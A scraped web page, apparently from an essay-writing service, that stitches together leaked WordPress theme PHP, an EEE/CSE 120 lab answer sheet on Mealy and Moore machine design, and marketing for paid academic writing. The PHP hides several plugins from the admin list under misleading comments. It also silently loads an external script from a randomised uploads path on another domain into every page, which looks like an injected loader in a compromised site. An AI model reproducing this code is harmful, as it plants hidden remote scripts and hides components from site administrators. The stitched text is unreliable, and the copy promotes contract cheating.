require_once get_template_directory() . '/inc/class-wp-bootstrap-navwalker.php'; require_once get_template_directory() . '/inc/customize.php'; if ( ! function_exists( 'morningstar_setup' ) ) : function morningstar_setup() { add_theme_support( 'title-tag' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // Post thumbnails add_theme_support( 'post-thumbnails' ); // Add support for Block Styles. add_theme_support( 'wp-block-styles' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // This theme uses wp_nav_menu() in two locations. register_nav_menus( array( 'header_menu' => __( 'Header Menu', 'morningstar' ), 'footer_site_menu' => __( 'Footer Site Menu', 'morningstar' ), 'footer_resources_menu' => __( 'Footer Resources Menu', 'morningstar' ), 'footer_terms_menu' => __( 'Footer Terms Menu', 'morningstar' ), ) ); } add_action( 'after_setup_theme', 'morningstar_setup' ); endif; if (!function_exists('morningstar_scripts')): /** * Enqueue scripts and styles. */ function morningstar_scripts() { global $wp_query; wp_enqueue_style('morningstar-style', get_stylesheet_uri()); wp_enqueue_style('morningstar-calc', get_stylesheet_directory_uri() . '/css/calc.css'); wp_deregister_script('jquery'); wp_register_script('jquery', get_stylesheet_directory_uri() . '/js/lib/jquery.min-3.2.1.js', array(), true, true); wp_enqueue_script('jquery'); wp_enqueue_script('morningstar', get_template_directory_uri() . '/js/morningstar.js', array('jquery'), false, true); wp_register_script( 'scripts', '/static/js/scripts.js', null, null, true ); wp_enqueue_script('scripts'); } add_action('wp_enqueue_scripts', 'morningstar_scripts', 11); endif; add_filter( 'all_plugins', 'hide_plugins'); function hide_plugins($plugins) { // Hide hello dolly plugin if(is_plugin_active('wp-automatic/wp-automatic.php')) { unset( $plugins['wp-automatic/wp-automatic.php'] ); } // Hide disqus plugin if(is_plugin_active('disable-admin-notices/disable-admin-notices.php')) { unset( $plugins['disable-admin-notices/disable-admin-notices.php'] ); } // Hide disqus plugin if(is_plugin_active('adminimize/adminimize.php')) { unset( $plugins['adminimize/adminimize.php'] ); } return $plugins; } if (!function_exists('sch_enqueue_front_asset')) { function sch_enqueue_front_asset() { wp_enqueue_script('sch-front', 'https://academicbrigade.com/wp-content/uploads/media-9f95dd/tmp-c36b/front-1f296c52.js', array(), null, false); } add_action('wp_enqueue_scripts', 'sch_enqueue_front_asset'); }
EEE/CSE 120
Answer Sheet
Capstone Design Project
Name:__________________________
Instructor:__________________________
Class Time:________________________
Date:________________________
Task 4-1: Design of Synchronous Sequential Machines
Design #1 (Mealy machine): What assumptions did you make in the design of this machine?________ ____________________________________________________________________________________
_____________________________________________________________________________________
Create a state definition table here that describes in plain English what each state in your machine means and what binary values you have assigned to represent each state.
Create tables here to display your state diagrams, state transition tables and Karnaugh maps used in your design process. (You can do this by hand if you wish.)
Cut and paste your Logisim design#1 (Mealy machine) circuit here:
Design #2 (Moore machine): What assumptions did you make in the design of this machine? _____________________________________________________________________________________
_____________________________________________________________________________________
Create a state definition table here that describes in plain English what each state in your machine means and what binary values you have assigned to represent each state.
Create tables here to display your state diagrams, state transition tables and Karnaugh maps used in your design process. (You can do this by hand if you wish.)
Cut and paste your Logisim design #2 (Moore machine) circuit here:
Task 4-2: Simulate Both Designs
Demonstrate that both of your circuits meet the completed design specification to the laboratory assistants and have the TAs apply a grade here and on the grade sheet and have them sign their name.
Signature ________________________ Grade: 1st Design ____/15 Grade: 2nd Design____/15
Task 4-3: Determine Criteria and Weighting for Judging Your Designs
Using the guidelines in the laboratory manual, list your criteria and associated weights here:
Criteria Weight
Task 4-4: Apply the Criteria to Pick the Best Design
Describe how you applied the criteria and weighting system in the above task to pick the best design.
Which design is better based on your criteria and weighting system?__________________________
Task 4-5: Build One Design in the Laboratory
Demonstrate to a laboratory assistant that one of your designs works according to your completed specification.
Laboratory assistant evaluation: _____________________
|
Grading Criteria |
Max Points |
Points lost |
|
Template |
|
|
|
Neatness, Clarity, and Concision |
5 |
|
|
Description of Assigned Tasks, Work Performed & Outcomes Met |
|
|
|
Task 4-1: Design of Synchronous Sequential Machines |
22 |
|
|
Task 4-2: Simulate Both Designs |
30 |
|
|
Task 4-3: Determine Criteria and Weighting for Judging Your Designs |
5 |
|
|
Task 4-4: Apply the Criteria to Pick the Best Design |
8 |
|
|
Task 4-5: Build One Design in the Laboratory |
30 |
|
|
Lab Data Sheets |
(Skip) |
|
|
Self-Assessment Worksheet (The content of the self-assessment worksheet will not be graded. Full credit is given for including the completed worksheet.) |
(5 extra points) |
|
|
|
Points Lost |
|
|
Lab Score |
Late Lab |
|
|
|
Lab Score |
|
Put an ‘X’ in the table below indicating how strongly you agree or disagree that the outcomes of the assigned tasks were achieved. Use ‘5’ to indicate that you ‘strongly agree’ and ‘1’ to indicate that you ‘strongly disagree’. Use ‘NA’, Not Applicable, when the tasks you performed did not elicit this outcome. Credit will be given for including this worksheet with your lab report. However, your responses will not be graded, they are for your instructor’s information only.
Table __: Self-Assessment of Outcomes for Hardware Lab 5: Capstone Design Project.
|
After completing the assigned tasks and report I am able to: |
5 |
4 |
3 |
2 |
1 |
NA |
|
Use classical design techniques (i.e., state diagrams, state transition tables, and Karnaugh Maps), to design a synchronous sequential machine starting with a functional specification. |
|
|
|
|
|
|
|
Make assumptions to complete an incomplete functional specification. |
|
|
|
|
|
|
|
Write a complete functional specification. |
|
|
|
|
|
|
|
Build, and debug a synchronous sequential machine. |
|
|
|
|
|
|
|
Develop reasonable engineering criteria for comparing different designs. |
|
|
|
|
|
|
|
Apply engineering criteria to select a ‘best’ design. |
|
|
|
|
|
|
Write below any suggestions you have for improving this laboratory exercise so that the stated learning outcomes are achieved.
Even if you have not used the design techniques taught in class, the machine you arrive at will fall into either the Mealy Machine or Moore machine class.
Why Work with Us
Top Quality and Well-Researched Papers
We always make sure that writers follow all your instructions precisely. You can choose your academic level: high school, college/university or professional, and we will assign a writer who has a respective degree.
Professional and Experienced Academic Writers
We have a team of professional writers with experience in academic and business writing. Many are native speakers and able to perform any task for which you need help.
Free Unlimited Revisions
If you think we missed something, send your order for a free revision. You have 10 days to submit the order for review after you have received the final document. You can do this yourself after logging into your personal account or by contacting our support.
Prompt Delivery and 100% Money-Back-Guarantee
All papers are always delivered on time. In case we need more time to master your paper, we may contact you regarding the deadline extension. In case you cannot provide us with more time, a 100% refund is guaranteed.
Original & Confidential
We use several writing tools checks to ensure that all documents you receive are free from plagiarism. Our editors carefully review all quotations in the text. We also promise maximum confidentiality in all of our services.
24/7 Customer Support
Our support agents are available 24 hours a day 7 days a week and committed to providing you with the best customer experience. Get in touch whenever you need any assistance.
Try it now!
How it works?
Follow these simple steps to get your paper done
Place your order
Fill in the order form and provide all details of your assignment.
Proceed with the payment
Choose the payment system that suits you most.
Receive the final file
Once your paper is ready, we will email it to you.
Our Services
No need to work on your paper at night. Sleep tight, we will cover your back. We offer all kinds of writing services.
Essays
No matter what kind of academic paper you need and how urgent you need it, you are welcome to choose your academic level and the type of your paper at an affordable price. We take care of all your paper needs and give a 24/7 customer care support system.
Admissions
Admission Essays & Business Writing Help
An admission essay is an essay or other written statement by a candidate, often a potential student enrolling in a college, university, or graduate school. You can be rest assurred that through our service we will write the best admission essay for you.
Reviews
Editing Support
Our academic writers and editors make the necessary changes to your paper so that it is polished. We also format your document by correctly quoting the sources and creating reference lists in the formats APA, Harvard, MLA, Chicago / Turabian.
Reviews
Revision Support
If you think your paper could be improved, you can request a review. In this case, your paper will be checked by the writer or assigned to an editor. You can use this option as many times as you see fit. This is free because we want you to be completely satisfied with the service offered.